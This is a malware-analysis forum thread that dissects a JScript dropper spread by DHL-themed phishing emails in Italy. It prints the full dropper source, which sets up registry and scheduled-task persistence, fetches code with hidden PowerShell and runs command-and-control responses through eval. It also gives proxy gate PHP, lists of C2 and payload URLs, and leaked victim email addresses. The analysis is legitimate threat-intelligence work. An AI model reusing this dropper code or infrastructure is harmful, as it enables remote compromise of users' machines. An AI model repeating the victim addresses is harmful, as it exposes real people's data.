JScript dropper

Forum for analysis and discussion about malware.

JScript dropper

Postby benkow_ » Sat Dec 17, 2016 3:53 pm

This dropper (in JScript) is related to some ursnif, andromeda, spambot campaigns
It target Italy these days.
Attack vector is email with an url to a zip.
http://www.malware-traffic-analysis.net ... index.html
http://malware-traffic-analysis.net/201 ... ndex2.html
ex:
Code: Select all
<img class="logo" alt="Track DHL Express Shipments" src="http://www.midnightlady2006.de/Alt/dhl.png" height="48" width="171"><br><br>
Gentile cliente giuseppe.lupano@libero.it <br><br>
Notifica, numero di consegna 1586783982<br>
<h2><center><a href="http://www.midnightlady2006.de/Alt/4857DHL.php">
documento stampa</a><center></h2><br>
Numero d'ordine: 668028042<br><br>
----------------------------------------------------------<br><br>
DHL Supply Chain (Italy) S.p.A.<br>
Sede Legale: Settala, (MI) viale delle industrie 2.<br>
Capitale sociale: Euro 1.548.000,00 diviso in n. 300.000 azioni da Euro 5,16 cad.- versato Euro 1.548.000,00<br><br> 
Soci: DHL Holding (Italy) S.r.l. (100%)<br>
Codice Fiscale/Registro Imprese: 00718630155<br>
R.E.A.: MI-618656<br>
<IMG width=1 height=1 src="http://194.58.118.144/m/a/89587.gif?Z2l1c2VwcGUubHVwYW5vQGxpYmVyby5pdA==" alt="tracking">

4857DHL.php point to https://www.virustotal.com/fr/file/6069 ... 481967305/
example of JScript:

Code: Select all
var shell = new ActiveXObject('WScript.Shell');
var timeout = 600000;
var gate = "http://www.elektro-morjan.de/l2.php";
var id = shell.ExpandEnvironmentStrings('%PROCESSOR_REVISION%');
 
shell.Run('REG ADD "HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run" /V "' + id + '0" /t REG_SZ /F /D "cmd.exe /c powershell.exe -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.Webclient).DownloadFile(\'' + gate + '?cmd=d\',\'%userprofile%\\' + id + '.js\'); %userprofile%\\' + id + '.js"', 0, false);
shell.Run('REG ADD "HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run" /V "' + id + '1" /t REG_SZ /F /D "%userprofile%\\' + id + '.js"', 0, false);
shell.Run('SCHTASKS /Create /TN ' + id + ' /SC DAILY /F /TR %userprofile%\\' + id + '.js', 0, false);
var stream = new ActiveXObject('ADODB.Stream');
stream.open();
stream.type = 2;
stream.WriteText('var VymBLi  = "EGCnsr";var JXvSGMKgEgIzb = "\\x33\\x26\\x31\\x4e\\x00\\x1a\\x20\\x2b\\x2f\\x4e\\x7a\\x4f\\x65\\x29\\x26\\x19\\x53\\x33\\x26\\x33\\x2a\\x18\\x16\\x2a\\x0a\\x25\\x29\\x0b\\x10\\x06\\x6d\\x60\\x14\\x3d\\x10\\x00\\x2c\\x37\\x37\\x40\\x20\\x1a\\x20\\x2b\\x2f\\x49\\x5a\\x49\\x4f\\x31\\x22\\x1c\\x53\\x06\\x2c\\x2a\\x26\\x01\\x06\\x06\\x65\\x7a\\x63\\x58\\x43\\x42\\x75\\x77\\x73\\x55\\x79\\x04\\x24\\x35\\x63\\x09\\x12\\x06\\x20\\x67\\x4a\\x53\\x53\\x50\\x2d\\x33\\x37\\x1e\\x49\\x5d\\x6a\\x22\\x2d\\x03\\x1c\\x06\\x2a\\x69\\x20\\x01\\x1e\\x5d\\x29\\x75\\x6d\\x1e\\x1b\\x02\\x67\\x7c\\x49\\x18\\x12\\x00\\x65\\x2e\\x27\\x67\\x53\\x7b\\x78\\x67\\x30\\x06\\x16\\x1e\\x29\\x69\\x06\\x16\\x03\\x13\\x2b\\x23\\x06\\x00\\x05\\x1b\\x37\\x28\\x2d\\x03\\x16\\x1c\\x31\\x14\\x37\\x1c\\x1a\\x1c\\x22\\x34\\x6b\\x49\\x56\\x22\\x17\\x08\\x00\\x2b\\x20\\x21\\x0a\\x15\\x1c\\x3c\\x36\\x24\\x0c\\x14\\x0a\\x21\\x3d\\x57\\x62\\x6e\\x78\\x64\\x79\\x01\\x2d\\x22\\x2f\\x02\\x5d\\x20\\x30\\x29\\x6b\\x49\\x21\\x37\\x02\\x67\\x02\\x2a\\x37\\x52\\x67\\x0f\\x08\\x2d\\x26\\x2e\\x19\\x14\\x0c\\x28\\x27\\x25\\x04\\x15\\x06\\x32\\x2f\\x3f\\x2c\\x24\\x31\\x01\\x00\\x1d\\x23\\x33\\x1f\\x32\\x24\\x1b\\x2b\\x23\\x2c\\x19\\x00\\x2e\\x19\\x04\\x36\\x1c\\x01\\x17\\x2b\\x33\\x15\\x0b\\x01\\x01\\x2c\\x28\\x2d\\x32\\x2f\\x20\\x30\\x29\\x61\\x4e\\x5c\\x24\\x65\\x65\\x64\\x4e\\x58\\x52\\x2c\\x23\\x63\\x45\\x53\\x55\\x75\\x65\\x63\\x41\\x07\\x52\\x17\\x02\\x04\\x31\\x20\\x28\\x65\\x68\\x05\\x4e\\x5c\\x36\\x65\\x65\\x20\\x03\\x17\\x5c\\x20\\x3f\\x26\\x4e\\x5c\\x11\\x65\\x37\\x2c\\x19\\x16\\x00\\x36\\x2f\\x26\\x02\\x1f\\x5c\\x20\\x3f\\x26\\x4e\\x5e\\x37\\x3d\\x22\\x20\\x1b\\x07\\x1b\\x2a\\x29\\x13\\x01\\x1f\\x1b\\x26\\x3e\\x63\\x0c\\x0a\\x02\\x24\\x34\\x30\\x4e\\x5e\\x1c\\x2a\\x37\\x31\\x01\\x15\\x1b\\x29\\x22\\x63\\x43\\x04\\x1b\\x2b\\x23\\x2c\\x19\\x00\\x06\\x3c\\x2b\\x26\\x4e\\x1b\\x1b\\x21\\x23\\x26\\x00\\x53\\x5a\\x0b\\x22\\x34\\x43\\x3c\\x10\\x2f\\x22\\x20\\x1a\\x53\\x21\\x3c\\x34\\x37\\x0b\\x1e\\x5c\\x0b\\x22\\x37\\x40\\x24\\x17\\x27\\x24\\x2f\\x07\\x16\\x1c\\x31\\x6e\\x6d\\x2a\\x1c\\x05\\x2b\\x2b\\x2c\\x0f\\x17\\x34\\x2c\\x2b\\x26\\x46\\x2f\\x55\\x62\\x67\\x68\\x4e\\x14\\x13\\x31\\x22\\x63\\x45\\x53\\x55\\x7a\\x24\\x2e\\x0a\\x4e\\x16\\x19\\x60\\x6f\\x32\\x54\\x57\\x30\\x34\\x26\\x1c\\x03\\x00\\x2a\\x21\\x2a\\x02\\x16\\x57\\x19\\x1b\\x64\\x4e\\x58\\x52\\x2c\\x23\\x63\\x45\\x53\\x55\\x6b\\x2d\\x30\\x32\\x54\\x5b\\x7e\\x67\\x66\\x1b\\x00\\x17\\x37\\x37\\x31\\x01\\x15\\x1b\\x29\\x22\\x66\\x32\\x2f\\x55\\x65\\x6c\\x63\\x07\\x17\\x52\\x6e\\x67\\x64\\x40\\x19\\x01\\x67\\x60\\x6f\\x4e\\x43\\x5e\\x65\\x21\\x22\\x02\\x00\\x17\\x6c\\x7c\\x49\\x1d\\x1b\\x17\\x29\\x2b\\x6d\\x3c\\x06\\x1c\\x6d\\x60\\x11\\x2b\\x34\\x52\\x04\\x03\\x07\\x4e\\x51\\x3a\\x0e\\x04\\x16\\x32\\x2f\\x21\\x0a\\x01\\x17\\x39\\x32\\x20\\x00\\x1b\\x1f\\x23\\x1a\\x11\\x37\\x28\\x30\\x01\\x15\\x06\\x19\\x1b\\x14\\x07\\x1d\\x16\\x2a\\x30\\x30\\x32\\x2f\\x31\\x30\\x35\\x31\\x0b\\x1d\\x06\\x13\\x22\\x31\\x1d\\x1a\\x1d\\x2b\\x1b\\x1f\\x3c\\x06\\x1c\\x67\\x67\\x6c\\x38\\x53\\x50\\x62\\x67\\x68\\x4e\\x1a\\x16\\x65\\x6c\\x63\\x49\\x42\\x50\\x65\\x68\\x37\\x4e\\x21\\x37\\x02\\x18\\x10\\x34\\x53\\x5d\\x03\\x67\\x6c\\x2a\\x53\\x50\\x60\\x32\\x30\\x0b\\x01\\x02\\x37\\x28\\x25\\x07\\x1f\\x17\\x60\\x1b\\x1f\\x49\\x53\\x59\\x65\\x2e\\x27\\x4e\\x58\\x52\\x62\\x69\\x29\\x1d\\x51\\x55\\x69\\x67\\x73\\x42\\x53\\x14\\x24\\x2b\\x30\\x0b\\x5a\\x49\\x4f\\x34\\x2b\\x0b\\x1f\\x1e\\x6b\\x15\\x36\\x00\\x5b\\x55\\x16\\x04\\x0b\\x3a\\x32\\x21\\x0e\\x14\\x63\\x41\\x30\\x00\\x20\\x26\\x37\\x0b\\x53\\x5d\\x11\\x09\\x63\\x49\\x53\\x59\\x65\\x2e\\x27\\x4e\\x58\\x52\\x62\\x67\\x6c\\x3d\\x30\\x52\\x01\\x06\\x0a\\x22\\x2a\\x52\\x6a\\x01\\x63\\x41\\x27\\x20\\x65\\x62\\x36\\x1d\\x16\\x00\\x35\\x35\\x2c\\x08\\x1a\\x1e\\x20\\x62\\x1f\\x32\\x54\\x52\\x6e\\x67\\x2a\\x0a\\x53\\x59\\x65\\x60\\x6d\\x04\\x00\\x55\\x69\\x67\\x73\\x42\\x53\\x14\\x24\\x2b\\x30\\x0b\\x5a\\x49\\x4f\\x4d\\x34\\x06\\x1a\\x1e\\x20\\x6f\\x37\\x1c\\x06\\x17\\x6c\\x67\\x38\\x64\\x7a\\x06\\x37\\x3e\\x63\\x15\\x79\\x7b\\x4c\\x31\\x22\\x1c\\x53\\x0a\\x28\\x2b\\x2b\\x1a\\x07\\x02\\x65\\x7a\\x63\\x00\\x16\\x05\\x65\\x06\\x20\\x1a\\x1a\\x04\\x20\\x1f\\x0c\\x0c\\x19\\x17\\x26\\x33\\x6b\\x49\\x3e\\x21\\x1d\\x0a\\x0f\\x5c\\x5d\\x2a\\x08\\x0b\\x0b\\x3a\\x27\\x22\\x62\\x6e\\x78\\x64\\x7a\\x7b\\x3d\\x2a\\x2f\\x06\\x07\\x06\\x35\\x69\\x2c\\x00\\x01\\x17\\x24\\x23\\x3a\\x1d\\x07\\x13\\x31\\x22\\x20\\x06\\x12\\x1c\\x22\\x22\\x63\\x53\\x53\\x14\\x30\\x29\\x20\\x1a\\x1a\\x1d\\x2b\\x6f\\x6a\\x4e\\x08\\x78\\x4c\\x4e\\x4a\\x07\\x15\\x52\\x6d\\x3f\\x2e\\x02\\x1b\\x06\\x31\\x37\\x6d\\x1c\\x16\\x13\\x21\\x3e\\x10\\x1a\\x12\\x06\\x20\\x67\\x7e\\x53\\x53\\x46\\x65\\x61\\x65\\x4e\\x0b\\x1f\\x29\\x2f\\x37\\x1a\\x03\\x5c\\x36\\x33\\x22\\x1a\\x06\\x01\\x65\\x7a\\x7e\\x4e\\x41\\x42\\x75\\x6e\\x63\\x15\\x79\\x7b\\x4c\\x4e\\x4a\\x07\\x15\\x52\\x6d\\x3f\\x2e\\x02\\x1b\\x06\\x31\\x37\\x6d\\x1c\\x16\\x01\\x35\\x28\\x2d\\x1d\\x16\\x26\\x20\\x3f\\x37\\x40\\x1f\\x17\\x2b\\x20\\x37\\x06\\x53\\x53\\x78\\x67\\x73\\x47\\x53\\x09\\x4f\\x4e\\x4a\\x67\\x7a\\x7b\\x20\\x31\\x22\\x02\\x5b\\x0a\\x28\\x2b\\x2b\\x1a\\x07\\x02\\x6b\\x35\\x26\\x1d\\x03\\x1d\\x2b\\x34\\x26\\x3a\\x16\\x0a\\x31\\x6e\\x78\\x64\\x7a\\x7b\\x4c\\x4e\\x3e\\x55\\x79\\x7b\\x4c\\x4e\\x3e\\x55\\x79\\x7b\\x4c\\x3a\\x78\\x64\\x7a\\x7b\\x3d\\x2a\\x2f\\x06\\x07\\x06\\x35\\x69\\x2c\\x1e\\x16\\x1c\\x6d\\x60\\x04\\x2b\\x27\\x55\\x69\\x67\\x24\\x0f\\x07\\x17\\x65\\x6c\\x63\\x49\\x4c\\x11\\x28\\x23\\x7e\\x1e\\x55\\x1b\\x21\\x7a\\x64\\x4e\\x58\\x52\\x2c\\x23\\x63\\x45\\x53\\x55\\x63\\x35\\x2d\\x0a\\x4e\\x55\\x65\\x6c\\x63\\x23\\x12\\x06\\x2d\\x69\\x31\\x0f\\x1d\\x16\\x2a\\x2a\\x6b\\x47\\x5f\\x52\\x23\\x26\\x2f\\x1d\\x16\\x5b\\x7e\\x4d\\x4a\\x67\\x0b\\x1f\\x29\\x2f\\x37\\x1a\\x03\\x5c\\x36\\x22\\x2d\\x0a\\x5b\\x5b\\x7e\\x4d\\x4a\\x67\\x17\\x17\\x29\\x22\\x37\\x0b\\x53\\x0a\\x28\\x2b\\x2b\\x1a\\x07\\x02\\x7e\\x4d\\x4a\\x67\\x24\\x21\\x26\\x35\\x2a\\x1e\\x07\\x5c\\x16\\x2b\\x26\\x0b\\x03\\x5a\\x31\\x2e\\x2e\\x0b\\x1c\\x07\\x31\\x6e\\x78\\x64\\x7a\\x0f\\x65\\x24\\x22\\x1a\\x10\\x1a\\x65\\x6f\\x26\\x47\\x53\\x09\\x4f\\x4d\\x4a\\x13\\x48\\x78\\x38\\x7c";for (var SiczyrKHcPCB = "", XCUvVL = 0, hFnVmXPHiJrSz = 0; XCUvVL < JXvSGMKgEgIzb.length; XCUvVL++) {SiczyrKHcPCB += String.fromCharCode(JXvSGMKgEgIzb.charCodeAt(XCUvVL) ^ VymBLi.charCodeAt(hFnVmXPHiJrSz));hFnVmXPHiJrSz++;if (hFnVmXPHiJrSz == VymBLi.length) {hFnVmXPHiJrSz = 0;};};this["eval"](SiczyrKHcPCB);', 0);
stream.position = 0;
stream.saveToFile(shell.ExpandEnvironmentStrings('%userprofile%') + '\\' + id + '.js', 2);
while (true) {
    try {
        var xmlhttp = new ActiveXObject('MSXML2.XMLHTTP');
        xmlhttp.onreadystatechange = function() {
            if (xmlhttp.readyState == 4 && xmlhttp.status == 200) {
                if (xmlhttp.responseText.length != 0) {
                    eval(xmlhttp.responseText);
                };
            };
        };
        xmlhttp.open('GET', gate + '?cmd=p&id=' + id + '&rnd=' + Math.random(), false);
        xmlhttp.send();
        delete xmlhttp;
        WScript.Sleep(timeout);
    } catch (e) {
 
    };
};


Code: Select all
var gate = "http://www.elektro-morjan.de/l2.php";
change at every refresh.
Full list of "gate" (compromised website, probably via FTP bruteforce):

Code: Select all
http://151.236.13.49/l2.php
http://151.236.13.49/l3.php
http://170567.webhosting65.1blu.de/l2.php
http://191860.webhosting63.1blu.de/l2.php
http://191860.webhosting63.1blu.de/l3.php
http://454391.webx04.mmc.at/l2.php
http://454391.webx04.mmc.at/l3.php
http://46.163.110.45/css/l2.php
http://46.163.110.45/css/l3.php
http://ballettschule-nottuln.de/l2.php
http://di000240.host.inode.at/l3.php
http://ebkk.nl/l2.php
http://edle-steine.at/l2.php
http://edle-steine.at/l3.php
http://enmoto.com/l2.php
http://enmoto.com/l3.php
http://evastrutzmann.at/l2.php
http://evi-verein.at/l2.php
http://evi-verein.at/l3.php
http://fioravanti-production.org/l2.php
http://friesl-keramik.at/l2.php
http://friesl-keramik.at/l3.php
http://ftp.dimensionevideo.it/l2.php
http://ftp.dimensionevideo.it/l3.php
http://ftp.italiabrowsergame.com/l2.php
http://ftp.italiabrowsergame.com/l3.php
http://ftp.msinformatica.it/l3.php
http://getting-reconnected.de/l2.php
http://getting-reconnected.de/l3.php
http://gunnebo.eniac.it/l2.php
http://gunnebo.eniac.it/l3.php
http://hobbygartenteich.at/l2.php
http://hostelinramallah.com/l2.php
http://hostelinramallah.com/l3.php
http://hotelsantantonio.com/l2.php
http://hotelsantantonio.com/l3.php
http://humanitas-gbr.de/l2.php
http://jambasket.com.hk/l2.php
http://jambasket.com.hk/l3.php
http://juwelier-hohenberger.de/l2.php
http://katstones.de/l2.php
http://lklv.wz.cz/l2.php
http://lklv.wz.cz/l3.php
http://mauriz.at/l2.php
http://mauriz.at/l3.php
http://meindl-edv.eu/l2.php
http://meindl-edv.eu/l3.php
http://nr11303.vhost-enzo.sil.at/l2.php
http://nr11303.vhost-enzo.sil.at/l3.php
http://pajaje.borec.cz/l2.php
http://pajaje.borec.cz/l3.php
http://patrickhess.de/l2.php
http://pferdemedizin-stanek.at/l2.php
http://portoverde.it/l2.php
http://portoverde.it/l3.php
http://positivemindstates.com/l2.php
http://psymaster.wz.cz/l2.php
http://psymaster.wz.cz/l3.php
http://reimer-wulf.de/l2.php
http://reimer-wulf.de/l3.php
http://sca.homelinux.com/l2.php
http://spatialpourtous.com/l2.php
http://spatialpourtous.com/l3.php
http://supercondmat.org/l2.php
http://supercondmat.org/l3.php
http://tennis-arnfels.at/l2.php
http://tennis-arnfels.at/l3.php
http://tischlerei-kreiner.at/l2.php
http://tischlerei-kreiner.at/l3.php
http://umzuegeberlin.com/l2.php
http://www.diamondfitness.hu/l2.php
http://www.drogenhilfezentrum.de/l2.php
http://www.dtk-brandenburg.de/l2.php
http://www.elektro-morjan.de/l2.php
http://www.elektro-morjan.de/l3.php
http://www.kurzhaarteckel-trakehner.de/l2.php
http://www.midnightlady2006.de/l2.php
http://www.msinformatica.it/l2.php
http://www.seelackenmuseum-sbg.at/l2.php
http://www.skyways-ragdolls-zwergspitze.de/l2.php
http://www.teeversand24.net/l2.php
http://www.valentinavalsania.it/mdb-databases/cgi-bin/l2.php
http://www.valentinavalsania.it/mdb-databases/cgi-bin/l3.php
http://www.webstream.at/l2.php


l2.php:
Code: Select all

<?php
    $ip 
= $_SERVER["REMOTE_ADDR"];
    echo @file_get_contents("http://109.120.142.156/loader2/gate.php?ip=$ip&".$_SERVER['QUERY_STRING']);
?>


GET request:
l2.php?cmd=p&id=4e03&rnd=1337 -> return other payloads. full list: https://pastebin.com/xBfgjhXy

it drop various stuff:
178.33.182.145/dll/100.bin
91.134.123.103/dload/100.bin
194.58.100.59/core/fix832922.ms
51892372.de.strato-hosting.eu/cgi-data/1.exe
https://www.virustotal.com/file/d5f72f1 ... 478963438/
https://www.virustotal.com/file/b5c87ca ... 481555696/
https://www.virustotal.com/file/fd11e03 ... 480163765/
https://www.virustotal.com/file/b5c87ca ... 481555696/
https://www.virustotal.com/file/6d764a9 ... 481979160/

some stats are openly available on the cnc server:
http://109.120.142.156/loader2/stat.php (17.972 bots)
http://109.120.142.156/loader3/stat.php

Spambot used for spreading JSDropper: https://www.virustotal.com/fr/file/b5c8 ... 481555696/
gate XXXX/webserver.php:
Code: Select all
<p class="codeStyle">$server = 'aHR0cDovLzE5NC4yNDcuMTMuOC9pbWcv';
if (($_POST=='')and($_GET=='')) { exit; }
echo file_get_contents(base64_decode($server).'?'.http_build_query($_GET), false, stream_context_create(array('http' => array('method' => 'POST','header' => 'Content-type: application/x-www-form-urlencoded','content' => http_build_query($_POST).'&ip='.$_SERVER))));

CNC: http://194.247.13.8/img/admin.php / http://194.247.13.8/js/admin.php

1 week ago the spambot was used for targets identification with this kind of emails:
Code: Select all
ti amo.chiamami. +398258863192
<IMG width=1 height=1 src="http://194.58.118.144/m/a/79757.gif?YmF0bWFubm84N0Bob3RtYWlsLml0" alt="mobile">


results of the identification wave are openly availabe
android:
Code: Select all
iXXX@XXXXX.it,x.x.x.x,Mozilla/5.0 (Linux; Android 6.0.1; SM-T805 Build/MMB29K; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/54.0.2840.85 Safari/537.36
info@betatechnologies.it,x.x.x.x,Mozilla/5.0 (Linux; Android 6.0.1; XT1562 Build/MPD24.107-52; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/54.0.2840.85 Mobile Safari/537.36
info@ambientesrl.it,x.x.x.x,Mozilla/5.0 (Linux; Android 6.0.1; SM-G935F Build/MMB29K; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/54.0.2840.85 Mobile Safari/537.36
info@ambientesrl.it,x.x.x.x,Mozilla/5.0 (Linux; Android 6.0.1; SM-G935F Build/MMB29K; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/54.0.2840.85 Mobile Safari/537.36
info@ambientesrl.it,x.x.x.x,Mozilla/5.0 (Linux; Android 6.0.1; SM-G935F Build/MMB29K; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/54.0.2840.85 Mobile Safari/537.36
info@ufhalignami.it,x.x.x.x,Mozilla/5.0 (Linux; U; Android 4.0.2; en-us; Galaxy NexusBuild/ICL53F) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
info@fratresotranto.it,x.x.x.x,Mozilla/5.0 (Linux; Android 6.0; ALE-L21 Build/HuaweiALE-L21; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/54.0.2840.85 Mobile Safari/537.36
[...]


iphone:
Code: Select all
deborah_1986@live.it,x.x.x.x,Mozilla/5.0 (iPhone; CPU iPhone OS 10_1_1 like Mac OS X) AppleWebKit/602.2.14 (KHTML, like Gecko) Mobile/14B100
ale.cupido@live.it,x.x.x.x,Mozilla/5.0 (iPhone; CPU iPhone OS 10_1_1 like Mac OS X) AppleWebKit/602.2.14 (KHTML, like Gecko) Mobile/14B100
martina.mulas@live.it,x.x.x.x,Mozilla/5.0 (iPhone; CPU iPhone OS 10_1_1 like Mac OS X) AppleWebKit/602.2.14 (KHTML, like Gecko) Mobile/14B100
vale_4694@live.it,x.x.x.x,Mozilla/5.0 (iPhone; CPU iPhone OS 10_1_1 like Mac OS X) AppleWebKit/602.2.14 (KHTML, like Gecko) Mobile/14B100
rzoby@live.it,x.x.x.x,Mozilla/5.0 (iPhone; CPU iPhone OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Mobile/11D257
andrea.mantegazza@live.it,x.x.x.x,Mozilla/5.0 (iPhone; CPU iPhone OS 10_0_2 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) Mobile/14A456
andrea.mantegazza@live.it,x.x.x.x,Mozilla/5.0 (iPhone; CPU iPhone OS 10_0_2 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) Mobile/14A456
andreaalfarano@live.it,x.x.x.x,Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_1) AppleWebKit/602.2.14 (KHTML, like Gecko)
edoardomazzella93@live.it,x.x.x.x,Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/600.8.9 (KHTML, like Gecko)
[...]


Office:
Code: Select all
mandinga@hotmail.it,x.x.x.x,Microsoft Office/16.0 (Microsoft Outlook Mail 16.0.7466; Pro)
cmax24@hotmail.it,x.x.x.x,Microsoft Office/16.0 (Microsoft Outlook Mail 16.0.7705; Pro)
fedi89@hotmail.it,x.x.x.x,Microsoft Office/16.0 (Microsoft Outlook Mail 16.0.7466; Pro)
luca.conte93@hotmail.it,x.x.x.x,Microsoft Office/16.0 (Microsoft Outlook Mail 16.0.7466; Pro)
[...]

etc.
Today it's used to spread banking trojan: https://www.virustotal.com/file/6d764a9 ... 481979160/

TL;DR:
JScript dropper CNC:
109.120.142.156/loader2/stat.php
109.120.142.156/loader3/stat.php
Spambot related CNC:
194.247.13.8/img/admin.php
194.247.13.8/js/admin.php
benkow_
 
Posts: 70
Joined: Sat Jan 24, 2015 12:14 pm
Reputation point: 44

Re: JScript dropper

Postby Antelox » Sun Dec 18, 2016 8:28 am

Antelox
 
Posts: 130
Joined: Sun Mar 21, 2010 10:38 pm
Reputation point: 106

Re: JScript dropper

Postby benkow_ » Sun Feb 26, 2017 4:33 pm

List on "Onliner" spambot still up (used for spreading Ursnif)
Code: Select all
http://194.247.13.8/img/login.php
http://194.247.13.178/naomi/login.php
http://194.247.13.196/asus/login.php
benkow_
 
Posts: 70
Joined: Sat Jan 24, 2015 12:14 pm
Reputation point: 44


Return to Malware

Who is online

Users browsing this forum: No registered users and 10 guests